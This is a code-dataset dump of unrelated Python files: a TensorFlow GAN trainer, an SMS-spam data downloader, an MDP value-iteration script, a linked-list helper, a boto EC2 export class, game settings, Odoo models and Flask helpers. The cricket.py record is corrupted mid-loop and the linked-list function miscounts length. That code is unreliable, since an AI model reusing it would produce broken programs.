\tax.plot(data_sets[i].index, data_sets[i]['deaths'], color='grey', alpha=0.3)\n\t# \ti += 1\n\t# fig.legend(bbox_to_anchor=(-0.15, 0.25, 0.5, 0.5))\n\t# fig.suptitle('Countries of interest timeline')\n\t# ax.set_xlabel('Dates')\n\t# pl.show()","sub_path":"countries copy.py","file_name":"countries copy.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558559755","text":"\nimport os\nimport time\nimport math\nfrom PIL import Image \n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorlayer as tl\n\nfrom glob import glob\n\nfrom utils import get_image\nfrom model_u2_3d_d2 import generator, discriminator1, discriminator2\n#from skimage import img_as_ubyte\n\n# Define TF Flags\nflags = tf.app.flags\nflags.DEFINE_integer(\"epoch\",1000, \"Epoch to train [2000]\")\nflags.DEFINE_float(\"learning_rate\", 0.0002, \"Learning rate of for adam [0.0002]\")\nflags.DEFINE_float(\"learning_rate2\", 0.00005, \"Learning rate of for RMSProp [0.00005]\")\nflags.DEFINE_float(\"beta1\", 0.5, \"Momentum term of adam [0.5]\")\nflags.DEFINE_float(\"train_size\", np.inf, \"The size of train images [np.inf]\")\nflags.DEFINE_integer(\"batch_size\",8 , \"The number of batch images [2]\")########\nflags.DEFINE_integer(\"image_size\", 128, \"The size of image to use (will be center cropped) [128]\")############\nflags.DEFINE_integer(\"output_size\", 128, \"The size of the output images to produce [128]\")\nflags.DEFINE_integer(\"sample_size\", 128, \"The number of sample images [128]\")\nflags.DEFINE_integer(\"c_dim\", 1, \"Dimension of image color. [1]\")\nflags.DEFINE_integer(\"sample_step\", 50, \"The interval of generating sample. [50]\")\nflags.DEFINE_integer(\"save_step\", 50, \"The interval of saveing checkpoints. [50]\")\nflags.DEFINE_string(\"dataset\", \"model_u2_3d_d2\", \"The name of dataset [coil-20, plant6]\")\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoint\", \"Directory name to save the checkpoints [checkpoint]\")\nflags.DEFINE_string(\"sample_dir\", \"samples\", \"Directory name to save the image samples [samples]\")\nflags.DEFINE_boolean(\"is_train\", False, \"True for training, False for testing [False]\")\nflags.DEFINE_boolean(\"is_crop\", True, \"True for training, False for testing [False]\")\nflags.DEFINE_boolean(\"visualize\", False, \"True for visualizing, False for nothing [False]\")\nFLAGS = flags.FLAGS\n\ndef main(_):\n\n # Print flags #///make flag to be object\n for flag, _ in FLAGS.__flags.items():\n print('\"{}\": {}'.format(flag, getattr(FLAGS, flag)))\n print(\"--------------------\")\n\n # Configure checkpoint/samples dir\n tl.files.exists_or_mkdir(FLAGS.checkpoint_dir)\n tl.files.exists_or_mkdir(FLAGS.sample_dir)\n\n CLIP = [-0.01,0.01]\n CRITIC_NUM = 5\n#read gaussian\n\n data_files = os.listdir(\"./gaussian_dataset\")\n num_files = len(data_files)\n for i in range(num_files):\n data_files[i]= int(data_files[i].split('.')[0].split('_')[2])\n # print(data_files)\n\n\n\n data_files.sort()\n\n #print(data_files)\n\n\n\n\n for i in range(num_files):\n data_files[i] = \"./gaussian_dataset/gaussianheavy_blackaverage_\"+str(data_files[i]).zfill(4)+\".png\"\n\n###############################################################\n images=[]\n\n for file in data_files:\n image = get_image(file, FLAGS.image_size, is_crop=FLAGS.is_crop, resize_w=FLAGS.output_size, is_grayscale = False)\n \n #bark36-color channel=3\n image = image[:,:,np.newaxis]\n\n #print(image.shape)\n #time.sleep(5)\n images.append(image)\n\n # Construct graph on GPU\n with tf.device(\"/gpu:0\"):\n\n #Define Models #\n ################################################################################################\n\n x_l = tf.placeholder(tf.float32, [None,1],name='x_noise')\n y_l = tf.placeholder(tf.float32, [None,1],name = 'y_noise')\n z_l = tf.placeholder(tf.float32, [None,1],name = 'z_noise')\n #z = [tf.cos(theta),tf.sin(theta)]\n # x_l = 10*tf.sin(phi)*tf.cos(theta)\n # y_l = 10*tf.sin(phi)*tf.sin(theta)\n # z_l = 10*tf.cos(phi)\n\n z = tf.concat([x_l,y_l,z_l],axis=1)\n \n\n real_images = tf.placeholder(tf.float32, [None, FLAGS.output_size, FLAGS.output_size, FLAGS.c_dim], name='real_images')\n\n sess = tf.InteractiveSession()\n\n # Input noise into generator for training####################reuse\n net_g = generator(z , is_train=True, reuse=False)\n #net_g = generator(z , is_train=True, reuse=True)\n\n # Input real and generated fake images into discriminator for training\n net_d1, d1g_logits1 = discriminator1(net_g.outputs, is_train=True, reuse=False)\n #net_d, d_logits = discriminator(net_g.outputs, is_train=True, reuse=True)\n _, d1x_logits1 = discriminator1(real_images, is_train=True, reuse=True)\n\n # Input noise into generator for ###################################evaluation\n # set is_train to False so that BatchNormLayer behave differently\n net_g2 = generator(z, is_train=False, reuse=True)\n\n\n\n\n#######WWWWWWWWWWWWWWGAN\n #Define Training Operations #\n # discriminator: real images are labelled as 1 ##############by using tf.ones_like(),make every tensor to be 1,as target\n d1_loss_real = -tf.reduce_mean(d1x_logits1, name='d1real')\n # discriminator: images from generator (fake) are labelled as 0\n d1_loss_fake = tf.reduce_mean(d1g_logits1, name='d1fake')\n # cost for updating discriminator\n d1_loss = 0.5*(d1_loss_real + d1_loss_fake)\n\n\n\n\n\n #d2\n # Input real and generated fake images into discriminator for training\n net_d2, d2g_logits2 = discriminator2(net_g.outputs, is_train=True, reuse=False)\n #net_d, d_logits = discriminator(net_g.outputs, is_train=True, reuse=True)\n _, d2x_logits2 = discriminator2(real_images, is_train=True, reuse=True)\n\n #with tf.name_scope(\"d2_loss_real\"):\n d2_loss_real = tf.reduce_mean(d2x_logits2, name='d2real')\n # discriminator: images from generator (fake) are labelled as 0\n #with tf.name_scope(\"d2_loss_real\"):\n d2_loss_fake = -tf.reduce_mean(d2g_logits2, name='d2fake')\n # cost for updating discriminator\n #with tf.name_scope(\"d2_loss\"):\n d2_loss = 0.5*(d2_loss_real + d2_loss_fake)\n\n\n #with tf.name_scope(\"d_loss\"):\n d_loss = d1_loss + d2_loss\n\n h4_params = tl.layers.get_variables_with_name(name='discriminator/d/h4/lin_sigmoid', train_only=True)\n h5_params = tl.layers.get_variables_with_name(name='discriminator/d/h5/lin_sigmoid', train_only=True)\n l2_params = h4_params + h5_params\n l2_wl = 0.0002\n \n for p in l2_params:\n weight_loss = tf.multiply(tf.nn.l2_loss(p), l2_wl)\n d_loss += weight_loss\n\n # generator: try to make the the fake images look real (1)\n g1_loss = -tf.reduce_mean(d1g_logits1, name='g1fake')\n g2_loss = tf.reduce_mean(d2g_logits2, name='g2fake')####\n g_loss = 0.5*(g1_loss + g2_loss)\n\n\n g_vars = tl.layers.get_variables_with_name('generator', True, True)\n d_vars = tl.layers.get_variables_with_name('discriminator', True, True)\n\n # Define optimizers for updating discriminator and generator\n d_optim = tf.train.RMSPropOptimizer(FLAGS.learning_rate2) \\\n .minimize(d_loss, var_list=d_vars)\n g_optim = tf.train.RMSPropOptimizer(FLAGS.learning_rate2) \\\n .minimize(g_loss, var_list=g_vars)\n clip_d_op = [var.assign(tf.clip_by_value(var,CLIP[0],CLIP[1])) for var in d_vars]\n # Init Session\n #sess = tf.InteractiveSession()\n\n f = pd.read_csv('./plant6.csv')\n f.columns = [\"COL1\",\"COL2\",\"COL3\"]\n\n x_label = f[[\"COL1\"]]\n x_label = np.array(x_label)\n\n y_label = f[[\"COL2\"]]\n y_label = np.array(y_label)\n\n z_label = f[[\"COL3\"]]\n z_label = np.array(z_label)\n\n\n index2 = np.arange(0,72,1)\n # for i in range(num_files):\n # x_label[i] = x_label\n # y_label[i] = y_label\n # z_label[i] = z_label\n images = np.asarray(images)\n sample_x_label= x_label[index2]\n sample_y_label= y_label[index2]\n sample_z_label= z_label[index2]\n sample_image = images[index2]\n batch_x_label = x_label[index2]\n batch_y_label = y_label[index2]\n batch_z_label = z_label[index2]\n batch_images = images[index2]\n\n\n\n with tf.name_scope('summary'):\n\n\n\n\n\n\n tf.summary.scalar('d1_loss', d1_loss)\n tf.summary.scalar('d2_loss', d2_loss)\n tf.summary.scalar('d_loss', d_loss)\n tf.summary.scalar('g1_loss', g1_loss)\n tf.summary.scalar('g2_loss', g2_loss)\n tf.summary.scalar('g_loss', g_loss)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('./logs', sess.graph)\n\n\n\n sess.run(tf.global_variables_initializer())\n\n model_dir = \"%s_%s_%s\" % (FLAGS.dataset, FLAGS.batch_size, FLAGS.output_size)\n save_dir = os.path.join(FLAGS.checkpoint_dir, model_dir)\n tl.files.exists_or_mkdir(FLAGS.sample_dir)\n tl.files.exists_or_mkdir(save_dir)\n\n # load the latest checkpoints\n net_g_name = os.path.join(save_dir, 'net_g.npz')\n net_d1_name = os.path.join(save_dir, 'net_d1.npz')\n net_d2_name = os.path.join(save_dir, 'net_d2.npz')\n\n\n\n #Training models #\n iter_counter = 0\n index = np.arange(72)\n for epoch in range(FLAGS.epoch):\n np.random.shuffle(index)\n\n #steps = 0\n for start_index in range(0, 72, FLAGS.batch_size):\n end_index = start_index+FLAGS.batch_size\n start_time = time.time()\n\n\n if start_index < 25 or start_index%500 == 0:\n critic_num = 25\n else:\n critic_num = CRITIC_NUM\n\n for _ in range(critic_num):\n\n # Updates the Discriminator(D)\n summary, errD, _ = sess.run([merged, d_loss, d_optim], feed_dict={x_l: batch_x_label[index[start_index:end_index]],\n y_l: batch_y_label[index[start_index:end_index]],z_l: batch_z_label[index[start_index:end_index]], \n real_images: batch_images[index[start_index:end_index]]})\n sess.run(clip_d_op)\n \n # Updates the Generator(G)\n # run generator twice to make sure that d_loss does not go to zero (different from paper)##########################\n for _ in range(2):\n errG, _ = sess.run([g_loss, g_optim], feed_dict={x_l: batch_x_label[index[start_index:end_index]],\n y_l: batch_y_label[index[start_index:end_index]],z_l: batch_z_label[index[start_index:end_index]]})\n \n end_time = time.time() - start_time\n #print(\"Epoch: [%2d/%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n # % (epoch, FLAGS.epoch, steps, batch_steps, end_time, errD, errG))\n print(\"Epoch: [%2d/%2d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n % (epoch, FLAGS.epoch, end_time, errD, errG))\n\n iter_counter += 1\n if np.mod(iter_counter, FLAGS.sample_step) == 0:\n # Generate images########################################################################the diffrence with feed-z_batch ?\n img, errD, errG = sess.run([net_g2.outputs, d_loss, g_loss], feed_dict={x_l:sample_x_label,y_l:sample_y_label,z_l:sample_z_label, real_images: sample_image})\n # Visualize generated images\n #tl.visualize.save_images(img, [num_tiles, num_tiles], './{}/train_{:02d}_{:04d}.png'.format(FLAGS.sample_dir, epoch, steps))\n print(\"[Sample] d_loss: %.8f, g_loss: %.8f\" % (errD, errG))\n\n if np.mod(iter_counter, FLAGS.save_step) == 0:\n # Save current network parameters\n print(\"[*] Saving checkpoints...\")\n tl.files.save_npz(net_g.all_params, name=net_g_name, sess=sess)\n tl.files.save_npz(net_d1.all_params, name=net_d1_name, sess=sess)\n tl.files.save_npz(net_d2.all_params, name=net_d2_name, sess=sess)\n print(\"[*] Saving checkpoints SUCCESS!\")\n writer.add_summary(summary, iter_counter)\n\n print(\"finish training, start testing...\")\n\n\n\n\n\n #150\n # noise_theta = np.zeros(shape = [150,1],dtype = np.float32)\n # for i in range(150):\n # noise_theta[i] = np.array([(360.0/150.0)*i*math.pi/180])\n\n # index = np.arange(0,150,1)\n # test_theta =noise_theta[index]\n\n # generated_images = sess.run(net_g2.outputs, \n # feed_dict={\n # theta: test_theta,\n # })\n\n \n\n t = pd.read_csv('./location_150.csv')\n t.columns = [\"COL1\",\"COL2\",\"COL3\"]\n x_test = t[[\"COL1\"]]\n x_test = np.array(x_test)\n\n y_test = t[[\"COL2\"]]\n y_test = np.array(y_test)\n\n z_test = t[[\"COL3\"]]\n z_test = np.array(z_test)\n\n index = np.arange(0,150,1)\n x_test = x_test[index]\n y_test = y_test[index]\n z_test = z_test[index]\n\n generated_images = sess.run(net_g2.outputs, \n feed_dict={\n x_l: x_test,y_l:y_test ,z_l: z_test,\n })\n\n #img=[]\n for i in range(150):\n #img = img_as_ubyte(generated_images[i])\n\n #tf.image.encode_png(generated_images[i],compression=-1,name=None)\n\n # mn = generated_images[i].min()\n # mx = generated_images[i].max()\n # mx -= mn\n # generated_images[i]=generated_images[i].astype(np.uint8)\n #generated_images[i] = generated_images[i]/generated_images[i].max()\n #generated_images[i] = 255*generated_images[i]\n \n\n #tl.visualize.save_image(generated_images[i].astype(np.uint8), './{}/train_{:02d}.png'.format(FLAGS.sample_dir, i))\n #steps += 1\n generated_images[i] = 128*generated_images[i]+127\n np.clip(generated_images[i],0,255)\n \n\n tl.visualize.save_image(generated_images[i].astype(np.uint8), './{}/train_{:02d}.png'.format(FLAGS.sample_dir, i))\n\n print(\"testing is finished\")\n writer.close()\n sess.close()\n\n\nif __name__ == '__main__':\n try:\n tf.app.run()\n except KeyboardInterrupt:\n print('EXIT')\n\n\n\n\n\n\n\n\"\"\"\n\n #72\n # noise_x = np.zeros(shape = [200,1] ,dtype = np.float32)\n # noise_y = np.zeros(shape = [200,1] ,dtype = np.float32)\n # noise_z = np.zeros(shape = [200,1] ,dtype = np.float32)\n\n noise_theta = np.zeros(shape = [200,1] ,dtype = np.float32)\n noise_phi = np.zeros(shape = [200,1] ,dtype = np.float32)\n\n\n\n\n\n\n\n for i in range(200):\n\n # noise_x[i] = 10*tf.sin((180.0/200.0)*i*math.pi/180)*tf.cos((360.0/200.0)*i*math.pi/180)\n # noise_y[i] = 10*tf.sin((180.0/200.0)*i*math.pi/180)*tf.sin((360.0/200.0)*i*math.pi/180)\n # noise_z[i] = 10*tf.cos((180.0/200.0)*i*math.pi/180)\n # phi = np.random.uniform(0,math.pi/180)\n # theta = np.random.uniform(0,2*math.pi/180)\n noise_theta[i] = np.array([(360.0/200.0)*i*math.pi/180])\n noise_phi[i] = np.array([(180.0/200.0)*i*math.pi/180])\n # noise_z[i] = np.array([10*tf.cos(phi)])\n\n\n\n index = np.arange(0,200,1)\n test_theta =noise_theta[index]\n test_phi =noise_phi[index]\n\n test_x = 10*tf.sin(test_phi)*tf.cos(test_theta)\n test_y = 10*tf.sin(test_phi)*tf.sin(test_theta)\n test_z = 10*tf.cos(test_phi)\n\n\n\"\"\"\n","sub_path":"tensorflow1.14/viewpoint_expansion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387768916","text":"\"\"\"\nDownload and extract data.\n\"\"\"\nimport urllib.request\nimport zipfile\n\nfrom deploy_model.util import remove_file, ensure_path_exists\nfrom train_model.util import REGRESSION_DATA_DIR, DATASET_DIR\n\n# URL = 'http://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'\n# URL = 'https://surfdrive.surf.nl/files/index.php/s/OZRd9BcxhGkxTuy/download' # V2\n# URL = 'https://surfdrive.surf.nl/files/index.php/s/H4e35DvjaX18pTI/download' # V3\nURL = 'https://surfdrive.surf.nl/files/index.php/s/HU5mY29RzxRlHCU/download' # V4\n\nensure_path_exists(DATASET_DIR)\nensure_path_exists(REGRESSION_DATA_DIR)\n\ndef get_data():\n '''Get the production data.'''\n zip_path, _ = urllib.request.urlretrieve(URL)\n with zipfile.ZipFile(zip_path, \"r\") as file:\n file.extractall(REGRESSION_DATA_DIR)\n\n remove_file(REGRESSION_DATA_DIR + '/SMSSpamCollection_diff')\n\n with open(REGRESSION_DATA_DIR + '/SMSSpamCollection', 'r') as src, \\\n open(DATASET_DIR + '/SMSSpamCollection', 'r') as diff, \\\n open(REGRESSION_DATA_DIR + '/SMSSpamCollection_diff', 'a') as dest:\n nonempty_lines = [line.strip(\"\\n\") for line in diff if line != \"\\n\"]\n ignore = len(nonempty_lines)\n i = 0\n for line in src:\n if i >= ignore:\n dest.write(line)\n i = i + 1\n\nif __name__ == 'main':\n get_data()\n","sub_path":"production_endpoint/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"547383507","text":"#-------------------------------------Imports--------------------------------------------------------#\nimport numpy as np\nimport random\nfrom queue import Queue\nimport copy\n\n\n\n#-------------------------------Initialisation and declaration----------------------------------#\nN = 2\nlamda = 0.9 #discount factor\nState = np.zeros((N,N), dtype=int)\nno_of_state = N*N\nno_of_iter = 6\nfor i in range(N):\n for j in range(N):\n State[i,j] = i*N+j \nprint(State)\n\nActionlist = [\"L\", \"U\", \"R\", \"D\"]\nrewards = {}\nno_of_rewards = 5\nreward_limit = 100\nwhile(len(rewards) max:\n max = temp_reward\n V[no_of_iter-1][s] = max\n\n# print(V)\n\n\ndef fun_V(temp_k,s):\n if temp_k == no_of_iter-1:\n return V[no_of_iter-1][s]\n max = 0\n j_wrt_max = 0\n for j,a in enumerate(Actionlist):\n if (s,a) in rewards.keys():\n temp_reward = rewards[(s,a)]\n else:\n temp_reward = 0\n\n other_part = 0\n for next_s in range(no_of_state):\n other_part +=(lamda*Transition_prob[s,next_s,j]*fun_V(temp_k+1,next_s))\n sum_temp = temp_reward+other_part\n if sum_temp > max:\n max = sum_temp\n j_wrt_max = j\n # V[temp_k][s] = max\n pi[temp_k][s] = j_wrt_max\n return max\n\nfor k in range(no_of_iter):\n k = (no_of_iter-1)-k\n print(\"k=\",k)\n for s in range(no_of_state):\n print(\"s=\",s)\n V[k][s] = fun_V(k,s)\n print(V[k],pi[k])\nprint(V)\n\n\n\n","sub_path":"9_week/cricket.py","file_name":"cricket.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565206906","text":"def find_mid(lst):\n # Write your code here\n if lst.get_head() is None:\n return None\n temp = lst.get_head()\n i = 1\n while temp:\n temp = temp.next_element\n i += 1\n lst_len = i + 1\n if lst_len % 2 == 0:\n mid_step = lst_len // 2 - 1\n else:\n mid_step = lst_len // 2\n\n fir = lst.get_head()\n while mid_step > 0:\n fir = fir.next_element\n mid_step -= 1\n\n return fir.data","sub_path":"datastructure/middleValue.py","file_name":"middleValue.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114612434","text":"from boto.ec2.ec2object import EC2Object\n\n\nclass ExportTask(EC2Object):\n \"\"\"\n Represents an EC2 ExportTask\n \"\"\"\n\n def __init__(self, connection=None):\n EC2Object.__init__(self, connection)\n self.request_id = None\n self.description = None\n self.id = None\n self.container_format = None\n self.disk_image_format = None\n self.bucket_name = self.s3_bucket = None\n self.bucket_path = self.s3_key = None\n self.instance_id = None\n self.target_environment = None\n self.state = None\n self.status_message = None\n self.volume_export_details = None\n\n def startElement(self, name, attrs, connection):\n retval = EC2Object.startElement(self, name, attrs, connection)\n if retval is not None:\n return retval\n\n if name == 'volumeExportDetails':\n self.volume_export_details = VolumeExportDetails()\n return self.volume_export_details\n return None\n\n def endElement(self, name, value, connection):\n if name == 'exportTaskId':\n self.id = value\n elif name == 'containerFormat':\n self.container_format= value\n elif name == 'diskImageFormat':\n self.disk_image_format = value\n elif name == 's3Bucket':\n self.bucket_name = self.s3_bucket = value\n elif name == 's3Key':\n self.bucket_path = self.s3_key = value\n elif name == 'instanceId':\n self.instance_id = value\n elif name == 'targetEnvironment':\n self.target_environment = value\n elif name == 'statusMessage':\n self.status_message= value\n else:\n setattr(self, name, value)\n\n\nclass ExportVolumeTask(ExportTask):\n \"\"\"\n Represents custom EC2 ExportVolumeTask\n \"\"\"\n\n def __init__(self, connection=None):\n super(ExportVolumeTask, self).__init__(connection)\n self.volume_id = None\n\n def endElement(self, name, value, connection):\n super(ExportVolumeTask, self).endElement(name, value, connection)\n if name == \"volumeId\":\n self.volume_id = value\n\n\nclass VolumeExportDetails(list):\n def __init__(self, connection=None):\n list.__init__(self)\n self.connection = connection\n\n def startElement(self, name, attrs, connection):\n if name == 'item':\n item = ExportVolumeTask(self)\n self.append(item)\n return item\n\n def endElement(self, name, value, connection):\n pass\n","sub_path":"boto/ec2/export_task.py","file_name":"export_task.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44009409","text":"import pygame as pg\nfrom random import shuffle\nvec = pg.math.Vector2\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nBROWN = (106, 55, 5)\nCYAN = (0, 0, 255)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"LEGEND OF PENGUINS python edition\"\n\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n# Player settings\nPLAYER_HEALTH = 780\nPLAYER_SPEED = 280\nPLAYER_ROT_SPEED = 200\nPLAYER_IMG = 'penguin.png'\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\nBARREL_OFFSET = vec(30, 0)\n\n# Weapon settings\nBULLET_IMG = 'bullet.png'\nWEAPONS = {}\nWEAPONS['machine'] = {'bullet_speed': 500,\n 'bullet_lifetime': 1000,\n 'rate': 100,\n 'kickback': 150,\n 'spread': 5,\n 'damage': 75,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\nWEAPONS['precision'] = {'bullet_speed': 500,\n 'bullet_lifetime': 100000,\n 'rate': 300,\n 'kickback': 100,\n 'spread': 0,\n 'damage': 100,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\n\n# Mob settings\nMOB_IMG = 'ManBlue_hold.png'\nMOB_SPEEDS = [150, 100, 75, 125]\nMOB_HIT_RECT = pg.Rect(0, 0, 30, 30)\nMOB_HEALTH = 600\nMOB_DAMAGE = 50\nMOB_KNOCKBACK = 20\nAVOID_RADIUS = 50\nDETECT_RADIUS = 400\n\n# Effects\nMUZZLE_FLASHES = ['smoke_01.png', 'smoke_02.png', 'smoke_03.png',\n 'smoke_04.png', 'smoke_05.png', 'smoke_06.png',\n 'smoke_07.png', 'smoke_08.png', 'smoke_09.png',\n 'smoke_10.png']\nFLASH_DURATION = 50\nDAMAGE_ALPHA = [i for i in range(0, 255, 55)]\nNIGHT_COLOR = (20, 20, 20)\nLIGHT_RADIUS = (500, 500)\nLIGHT_MASK = \"light_350_med.png\"\n\n# Layers\nWALL_LAYER = 1\nPLAYER_LAYER = 2\nBULLET_LAYER = 3\nMOB_LAYER = 2\nEFFECTS_LAYER = 4\nITEMS_LAYER = 1\n\n# Items\nITEM_IMAGES = {'health': 'health_pack.png',\n 'precicion': 'hitpro.png'}\nHEALTH_PACK_AMOUNT = 62\nBOB_RANGE = 10\nBOB_SPEED = 0.3\n\n# Sounds\nmusic = ['Happy Tune.wav']\nshuffle(music)\nBG_MUSIC = music[0]\nWEAPON_SOUNDS = {'machine': ['pistol.wav'],\n 'precision': ['shotgun.wav']}\nEFFECTS_SOUNDS = {'level_start': 'level_start.wav',\n 'health_up': 'health_pack.wav',}","sub_path":"UTS/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201051338","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\nfrom openerp.addons.pabi_base.models.res_common import ResCommon\n\n# ORG Structure:\n# (mission)\n# costcenter\n# o\n# |\n# m\n# org -> sector -> subsector -> division -> section\n#\n# * Now, if section:costcenter = 1:1, choose costcenter will know section\n# * In future, if section:costcenter = 2:1, user will have to choose section\n\n\nclass ResOrg(ResCommon, models.Model):\n _name = 'res.org'\n _description = 'Org'\n\n operating_unit_id = fields.Many2one(\n 'operating.unit',\n string='Operating Unit',\n )\n logo = fields.Binary(\n string='Logo',\n )\n name_print_text = fields.Char(\n string='Print Name',\n translate=True,\n )\n address_print_text = fields.Text(\n string='Print Address',\n translate=True,\n )\n branch_200 = fields.Text(\n string='Branch 200%',\n translate=True,\n )\n\n\nclass ResSector(ResCommon, models.Model):\n _name = 'res.sector'\n _description = 'Sector'\n\n org_id = fields.Many2one(\n 'res.org',\n string='Org',\n required=True,\n )\n\n\nclass ResSubsector(ResCommon, models.Model):\n _name = 'res.subsector'\n _description = 'Subsector'\n\n sector_id = fields.Many2one(\n 'res.sector',\n string='Sector',\n required=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='sector_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n\n\nclass ResDivision(ResCommon, models.Model):\n _name = 'res.division'\n _description = 'Division'\n\n subsector_id = fields.Many2one(\n 'res.subsector',\n string='Subsector',\n required=True,\n )\n sector_id = fields.Many2one(\n 'res.sector',\n related='subsector_id.sector_id',\n string='Sector',\n readonly=True,\n required=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='subsector_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n\n\nclass ResSection(ResCommon, models.Model):\n _name = 'res.section'\n _description = 'Section'\n\n division_id = fields.Many2one(\n 'res.division',\n string='Division',\n required=True,\n )\n costcenter_id = fields.Many2one(\n 'res.costcenter',\n string='Costcenter',\n required=True,\n )\n subsector_id = fields.Many2one(\n 'res.subsector',\n related='division_id.subsector_id',\n string='Subsector',\n readonly=True,\n store=True,\n )\n sector_id = fields.Many2one(\n 'res.sector',\n related='division_id.sector_id',\n string='Sector',\n readonly=True,\n store=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='division_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n mission_id = fields.Many2one(\n 'res.mission',\n string='Mission',\n required=False,\n )\n fund_ids = fields.Many2many(\n 'res.fund',\n 'res_fund_section_rel',\n 'section_id', 'fund_id',\n string='Funds',\n default=lambda self: self.env.ref('base.fund_nstda'),\n )\n\n\nclass ResCostcenter(ResCommon, models.Model):\n _name = 'res.costcenter'\n _description = 'Cost Center'\n\n section_ids = fields.One2many(\n 'res.section',\n 'costcenter_id',\n string='Sections',\n readonly=True,\n )\n taxbranch_id = fields.Many2one(\n 'res.taxbranch',\n string='Tax Branch',\n required=False,\n )\n\n\nclass ResTaxbranch(ResCommon, models.Model):\n _name = 'res.taxbranch'\n _description = 'Tax Branch'\n\n street = fields.Char(\n string='Street',\n translate=True,\n )\n street2 = fields.Char(\n string='Street2',\n translate=True,\n )\n zip = fields.Char(\n string='Zip',\n )\n city = fields.Char(\n string='City',\n translate=True,\n )\n country_id = fields.Many2one(\n 'res.country',\n string='Country',\n )\n email = fields.Char(\n string='Email',\n )\n phone = fields.Char(\n string='Phone',\n )\n fax = fields.Char(\n string='Fax',\n )\n website = fields.Char(\n string='website',\n )\n taxid = fields.Char(\n string='Tax ID',\n )\n address_print_text = fields.Text(\n string='Print Address',\n translate=True,\n )\n address_print_text_receipt = fields.Text(\n string='Print Address (Receipt)',\n translate=True,\n )\n payment_method_text = fields.Text(\n string='Print Payment Method',\n translate=True,\n )\n # org_id = fields.Many2one(\n # 'res.org',\n # string='Org',\n # required=True,\n # )\n","sub_path":"pabi_base/models/res_org_structure.py","file_name":"res_org_structure.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"544829035","text":"from app.models import db\nfrom app.models.semestre import Semestre\nfrom app.models.semestre_especialidad import Semestre_especialidad\nfrom app.models.especialidad import Especialidad\nfrom app.models.curso import Curso\n\ndef crearSemestre(nombreSemestre):\n objSemestre = Semestre(nombre = nombreSemestre,flg_activo = 0)\n Semestre().addOne(objSemestre)\n return { 'message' : 'Se agrego correctamente'}\n\ndef listarSemestresNoActivos():\n semestres = Semestre().getAllNoActivos().all()\n lstSemestre = []\n for semestre in semestres:\n aux ={}\n aux['nombre'] = semestre.nombre\n aux['idSemestre'] = semestre.id_semestre\n lstSemestre.append(aux)\n\n return lstSemestre\n\ndef activarSemestre(idSemestre):\n Semestre().activar(idSemestre) \n Semestre_especialidad().activacionSemestre(idSemestre)\n return { 'message' : 'Se agrego correctamente'}\n\n\n\n\ndef obtenerlistaSemestresNoActivos():\n listaSemestres = Semestre.getAll()\n lista = list()\n for semestre in listaSemestres:\n c = {}\n c['id_semestre'] = semestre.id_semestre\n c['nombre'] = semestre.nombre\n lista.append(c)\n\n listaS = {}\n listaS['listaSemestres'] = lista\n \n return listaS\n\n\ndef obtenerEspecialidadxSemestre():\n semestreActivo = Semestre().getOne()\n idsemestre = semestreActivo.id_semestre\n especialidades = Semestre_especialidad().obtenerEspecialidadActivo(idsemestre)\n print(especialidades)\n lista = list()\n for especialidad in especialidades:\n idespecialidad = especialidad.id_especialidad\n print(idespecialidad)\n esp = Especialidad().getOne(idespecialidad)\n c = {}\n c['id_especialidad'] = esp.id_especialidad\n c['nombre'] = esp.nombre\n lista.append(c)\n\n listaE = {}\n \n listaE['listaEspecialidades'] = lista\n \n return listaE\n\n\ndef obtenerCursosxEspecialidad(idespecialidad):\n semestreActivo=Semestre().getOne()\n listaCursos= Curso.getCursosActivosxEspecialidad(semestreActivo.id_semestre,idespecialidad)\n lista=list()\n for curso in listaCursos:\n c={}\n c['id_curso'] = curso.id_curso \n c['nombre'] = curso.nombre\n c['clave'] = curso.codigo\n lista.append(c)\n\n listaC={}\n listaC['listaCursos'] = lista\n return listaC\n\ndef 